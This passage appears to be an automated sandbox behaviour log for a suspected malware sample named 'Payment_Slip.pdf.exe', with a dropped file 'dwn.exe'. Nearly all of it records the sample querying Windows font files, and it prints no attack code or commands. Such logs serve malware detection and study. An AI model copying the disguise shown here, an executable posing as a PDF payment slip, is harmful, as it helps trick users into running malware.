Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetLocaleInfoW, 17_2_00445E1C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 17_2_0044EEB8
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Users\user\Desktop\Payment_Slip.pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
